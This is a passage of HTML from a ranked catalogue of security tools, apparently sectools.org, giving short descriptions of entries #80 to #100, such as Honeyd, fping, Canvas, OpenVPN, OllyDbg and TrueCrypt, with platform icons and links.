local (inetd-startable) or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code. It will negotiate an SSL connection using the <a href="http://sectools.org/tools2.html#openssl">OpenSSL</a> or SSLeay libraries. <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="honeyd"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#80</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">37</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.citi.umich.edu/u/provos/honeyd/"><img src="http://mirror.sectools.org/logos/honeyd-80x81.png" align="right" border="0" width="80" height="81" /></a> <a href="http://www.citi.umich.edu/u/provos/honeyd/">Honeyd</a> : Your own personal <a href="http://www.honeynet.org/">honeynet</a><br />Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their TCP personality can be adapted so that they appear to be running certain versions of operating systems. Honeyd enables a single host to claim multiple addresses on a LAN for network simulation. It is possible to ping the virtual machines, or to traceroute them. Any type of service on the virtual machine can be simulated according to a simple configuration file. It is also possible to proxy services to another machine rather than simulating them. It has many library dependencies, which can make compiling/installing Honeyd difficult. </td></tr></tbody></table><hr /><a name="fping"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#81</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">25</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.fping.com/">Fping</a> : A parallel ping scanning program<br />fping is a ping(1) like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable. </td></tr></tbody></table><hr /><a name="base"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#82</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://sourceforge.net/projects/secureideas/">BASE</a> : The Basic Analysis and Security Engine<br />BASE is a PHP-based analysis engine to search and process a database of security events generated by various IDSs, firewalls, and network monitoring tools. Its features include a query-builder and search interface for finding alerts matching different patterns, a packet viewer/decoder, and charts and statistics based on time, sensor, signature, protocol, IP address, etc. <p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="argus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#83</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.qosient.com/argus/"><img src="http://mirror.sectools.org/logos/argus-80x36.png" align="right" border="0" width="80" height="36" /></a> <a href="http://www.qosient.com/argus/">Argus</a> : A generic IP network transaction auditing tool<br />Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information. <p>See all <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="wikto"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#84</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.sensepost.com/research/wikto/">Wikto</a> : Web Server Assessment Tool<br />Wikto is a tool that checks for flaws in webservers. It provides much the same functionality as <a href="http://sectools.org/index.html#nikto">Nikto</a> but adds various interesting pieces of functionality, such as a Back-End miner and close <a href="http://sectools.org/tools2.html#google">Google</a> integration. Wikto is written for the MS .NET environment and registration is required to download the binary and/or source code. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="sguil"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#85</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://sguil.sourceforge.net/"><img src="http://mirror.sectools.org/logos/sguil-80x62.png" align="right" border="0" width="80" height="62" /></a> <a href="http://sguil.sourceforge.net/">Sguil</a> : The Analyst Console for Network Security Monitoring<br />Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides realtime events from <a href="http://sectools.org/index.html#snort">Snort</a>/barnyard. It also includes other components which facilitate the practice of Network Security Monitoring and event driven analysis of IDS alerts. <p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="scanrand"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#86</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">39</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.doxpara.com/">Scanrand</a> : An unusually fast stateless network service and topology discovery system<br />Scanrand is a stateless host-discovery and port-scanner similar in design to <a href="http://sectools.org/tools4.html#unicornscan">Unicornscan</a>. It trades off reliability for amazingly fast speeds and uses cryptographic techniques to prevent attackers from manipulating scan results. This utility is a part of a software package called Paketto Keiretsu, which was written by <a href="http://www.doxpara.com/">Dan Kaminsky</a>. Scanrand and Paketto are no longer actively maintained, but the latest released version can still be found at <a href="http://www.doxpara.com/">DoxPara.Com</a>. <p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="ipfilter"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#87</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://coombs.anu.edu.au/%7Eavalon/">IP Filter</a> : Portable UNIX Packet Filter<br />IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services. It can either be used as a loadable kernel module or incorporated into your UNIX kernel; use as a loadable kernel module where possible is highly recommended. Scripts are provided to install and patch system files, as required. IP Filter is distributed with FreeBSD, NetBSD, and Solaris. OpenBSD users should see <a href="http://sectools.org/tools3.html#openbsd-pf">Openbsd PF</a> and Linux users <a href="http://sectools.org/index.html#netfilter">Netfilter</a>. <p>See all <a href="http://sectools.org/firewalls.html">firewalls</a> </p></td></tr></tbody></table><hr /><a name="canvas"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#88</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.immunitysec.com/products-canvas.shtml"><img src="http://mirror.sectools.org/logos/canvas-97x66.gif" align="right" border="0" width="97" height="66" /></a> <a href="http://www.immunitysec.com/products-canvas.shtml">Canvas</a> : A Comprehensive Exploitation Framework<br />Canvas is a commercial vulnerability exploitation tool from Dave Aitel's <a href="http://www.immunitysec.com/">ImmunitySec</a>. It includes more than 150 exploits and is less expensive than <a href="http://sectools.org/tools2.html#impact">Core Impact</a>, though it still costs thousands of dollars. You can also buy the optional <a href="http://www.immunitysec.com/products-visualsploit.shtml">VisualSploit Plugin</a> for drag and drop GUI exploit creation. Zero-day exploits can occasionally be found within Canvas. <p>See all <a href="http://sectools.org/sploits.html">vulnerability exploitation tools</a> </p></td></tr></tbody></table><hr /><a name="vmware"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#89</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.vmware.com/"><img src="http://mirror.sectools.org/logos/vmware-80x19.png" align="right" border="0" width="80" height="19" /></a> <a href="http://www.vmware.com/">VMware</a> : Multi-platform Virtualization Software<br />VMware virtualization software lets you run one operating system within another. This is quite useful for security researchers who commonly need to test code, exploits, etc on multiple platforms. It only runs on Windows and Linux as the host OS, but pretty much any x86 OS will run inside the virtualized environment. It is also useful for setting up sandboxes. You can browse from within a VMware window so the even if you are infected with malware, it cannot reach your host OS. And recovering the guest OS is as simple as loading a "snapshot" from prior to the infection. <a href="http://www.vmware.com/products/player/">VMware player</a> (executes, but can't create OS images) and <a href="http://www.vmware.com/products/server/">VMWare Server</a> (partitions a physical server machine into multiple virtual machines) were recently released for free. Another interesting virtualization system (Linux focused) is <a href="http://www.cl.cam.ac.uk/Research/SRG/netos/xen/">Xen</a>. </td></tr></tbody></table><hr /><a name="tcptraceroute"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#90</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">31</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://michael.toren.net/code/tcptraceroute/">Tcptraceroute</a> : A traceroute implementation using TCP packets<br />The problem is that with the widespread use of firewalls on the modern Internet, many of the packets that the conventional traceroute(8) sends out (ICMP echo or UDP) end up being filtered, making it impossible to completely trace the path to the destination. However, in many cases, these firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections on. By sending out TCP SYN packets instead of UDP or ICMP ECHO packets, tcptraceroute is able to bypass the most common firewall filters. <p>See all <a href="http://sectools.org/traceroutes.html">traceroute tools</a> </p></td></tr></tbody></table><hr /><a name="saint"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#91</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">67</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.saintcorporation.com/saint/"><img src="http://mirror.sectools.org/logos/saint-80x37.png" align="right" border="0" width="80" height="37" /></a> <a href="http://www.saintcorporation.com/saint/">SAINT</a> : Security Administrator's Integrated Network Tool<br />SAINT is another commercial vulnerability assessment tool (like <a href="http://sectools.org/index.html#nessus">Nessus</a>, <a href="http://sectools.org/tools3.html#iss">ISS Internet Scanner</a>, or <a href="http://sectools.org/tools2.html#retina">Retina</a>). It runs on UNIX and used to be free and open source, but is now a commercial product. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="openvpn"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#92</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://openvpn.net/">OpenVPN</a> : A full-featured SSL VPN solution<br />OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses <a href="http://sectools.org/tools2.html#openssl">OpenSSL</a> as its primary cryptographic library. <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="ollydbg"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#93</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.ollydbg.de/"><img src="http://mirror.sectools.org/logos/ollydbg-50x50.png" align="right" border="0" width="50" height="50" /></a> <a href="http://www.ollydbg.de/">OllyDbg</a> : An assembly level Windows debugger<br />OllyDbg is a 32-bit assembler level analyzing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg features an intuitive user interface, advanced code analysis capable of recognizing procedures, loops, API calls, switches, tables, constants and strings, an ability to attach to a running program, and good multi-thread support. OllyDbg is free to download and use but no source code is provided. <p>See all <a href="http://sectools.org/disassemblers.html">disassemblers</a> </p></td></tr></tbody></table><hr /><a name="helix"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#94</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.e-fense.com/helix/">Helix</a> : A Linux Distribution with Computer Forensics in Mind<br />Helix is a customized distribution of the Knoppix Live Linux CD. Helix is more than just a bootable live CD. You can still boot into a customized Linux environment that includes customized Linux kernels, excellent hardware detection and many applications dedicated to Incident Response and Forensics. Helix has been designed very carefully to NOT touch the host computer in any way and it is forensically sound. Helix will not auto mount swap space, or auto mount any attached devices. Helix also has a special Windows autorun side for Incident Response and Forensics. <p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="bastille"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#95</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">38</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.bastille-unix.org/"><img src="http://mirror.sectools.org/logos/bastille-80x64.gif" align="right" border="0" width="80" height="64" /></a> <a href="http://www.bastille-unix.org/">Bastille</a> : Security hardening script for Linux, Mac OS X, and HP-UX<br />The Bastille Hardening program "locks down" an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system's current state of hardening, granularly reporting on each of the security settings with which it works. Bastille currently supports the Red Hat (Fedora Core, Enterprise, and Numbered/Classic), SUSE, Debian, Gentoo, and Mandrake distributions, along with HP-UX and Mac OS X. Bastille's focuses on letting the system's user/administrator choose exactly how to harden the operating system. In its default hardening mode, it interactively asks the user questions, explains the topics of those questions, and builds a policy based on the user's answers. It then applies the policy to the system. In its assessment mode, it builds a report intended to teach the user about available security settings as well as inform the user as to which settings have been tightened. <p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="acunetix"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#96</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.acunetix.com/"><img src="http://mirror.sectools.org/logos/acunetix-80x59.gif" align="right" border="0" width="80" height="59" /></a> <a href="http://www.acunetix.com/">Acunetix WVS</a> : Commercial Web Vulnerability Scanner<br />Acunetix WVS automatically checks web applications for vulnerabilities such as SQL Injections, cross site scripting, arbitrary file creation/deletion, weak password strength on authentication pages. AcuSensor technology detects vulnerabilities which typical black box scanners miss. Acunetix WVS boasts a comfortable GUI, an ability to create professional security audit and compliance reports, and tools for advanced manual webapp testing. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="truecrypt"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#97</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.truecrypt.org/"><img src="http://mirror.sectools.org/logos/truecrypt-40x49.png" align="right" border="0" width="40" height="49" /></a> <a href="http://www.truecrypt.org/">TrueCrypt</a> : Open-Source Disk Encryption Software for Windows and Linux<br />TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever <a href="http://www.truecrypt.org/user-guide/hidden-volume.php">hidden volume</a> feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists. <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="appscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#98</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.ibm.com/software/awdtools/appscan/"><img src="http://mirror.sectools.org/logos/appscan-35x48.gif" align="right" border="0" width="35" height="48" /></a> <a href="http://www.ibm.com/software/awdtools/appscan/">Rational AppScan</a> : Commercial Web Vulnerability Scanner<br />AppScan provides security testing throughout the application development lifecycle, easing unit testing and security assurance early in the development phase. Appscan scans for many common vulnerabilities, such as cross site scripting, HTTP response splitting, parameter tampering, hidden field manipulation, backdoors/debug options, buffer overflows and more. Appscan was merged into IBM's Rational division after IBM purchased it's original developer (Watchfire) in 2007. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="n-stealth"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#99</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">72</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.nstalker.com/nstealth/">N-Stealth</a> : Web server scanner<br />N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as <a href="http://sectools.org/tools3.html#whisker-libwhisker">Whisker/libwhisker</a> and <a href="http://sectools.org/index.html#nikto">Nikto</a>, but do take their web site with a grain of salt. The claims of "30,000 vulnerabilities and exploits" and "Dozens of vulnerability checks are added every day" are highly questionable. Also note that essentially all general VA tools such as <a href="http://sectools.org/index.html#nessus">Nessus</a>, <a href="http://sectools.org/tools3.html#iss">ISS Internet Scanner</a>, <a href="http://sectools.org/tools2.html#retina">Retina</a>, <a href="http://sectools.org/tools4.html#saint">SAINT</a>, and <a href="http://sectools.org/tools3.html#sara">Sara</a> include web scanning components. They may not all be as up-to-date or flexible though. N-Stealth is Windows only and no source code is provided. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="mbsa"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#100</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">37</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.microsoft.com/technet/security/tools/mbsahome.mspx"><img 